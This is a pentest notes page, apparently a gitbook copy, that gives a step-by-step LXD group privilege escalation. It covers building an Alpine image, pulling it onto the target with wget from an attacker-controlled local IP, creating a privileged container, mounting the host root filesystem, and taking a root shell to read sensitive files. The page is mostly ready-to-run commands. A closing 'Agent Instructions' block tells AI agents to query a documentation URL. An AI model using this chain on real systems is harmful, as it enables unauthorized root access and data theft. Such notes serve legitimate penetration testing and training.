# LXC/LXD (Linux Container/Daemon) Privilege Escalation

### [Basic Flow](https://exploit-notes.hdks.org/exploit/linux/container/lxc-lxd-privilege-escalation/#basic-flow) <a href="#basic-flow" id="basic-flow"></a>

1. **Check if You are in the Lxd Group**

   If you belong to the Lxd group, you may be able to the root privileges.

   ```sh
   groups
   id
   Copied!
   ```
2. **Check if Container Image Exists**

   List all images and check if a container image already exists.

   ```sh
   lxc image list
   Copied!
   ```

   If there are not container, build a new image in your local machine.

   ```sh
   git clone  https://github.com/saghul/lxd-alpine-builder.git
   cd lxd-alpine-builder
   sudo ./build-alpine
   python3 -m http.server 8000
   Copied!
   ```

   In remote machine, download the “alpine-\*.tar.gz” and import it.

   ```sh
   wget http://<local-ip>:8000/alpine-v3.17-x86_64-20221206_0615.tar.gz
   lxc image import ./alpine-v3.17-x86_64-20221206_0615.tar.gz --alias testimage
   lxc image list
   Copied!
   ```

   After that, create a new container from the image.

   ```sh
   lxc init testimage testcontainer -c security.privileged=true
   Copied!
   ```

   If you got the error “**No storage pool found. Please create a new storage pool.”, initialize the lxd at first.**

   ```sh
   lxd init
   # Set default values in prompt
   Copied!
   ```

   Then create a new container as above command.
3. **Mount the New Container to Root Directory**

   Now mount the host's **/** directory onto **/mnt/root** in the container you created.

   ```sh
   lxc config device add testcontainer testdevice disk source=/ path=/mnt/root recursive=true
   Copied!
   ```
4. **Start the Container**

   ```sh
   lxc start testcontainer
   Copied!
   ```
5. **Get a Shell**

   ```sh
   lxc exec testcontainer /bin/sh
   Copied!
   ```

   Check if you are root.

   ```sh
   whoami
   Copied!
   ```
6. **Retrieve the Sensitive Information in the Mounted Directory**

   ```sh
   cd /mnt/root/
   ```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://morgan-bin-bash.gitbook.io/linux-privilege-escalation/lxc-lxd-linux-container-daemon-privilege-escalation.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.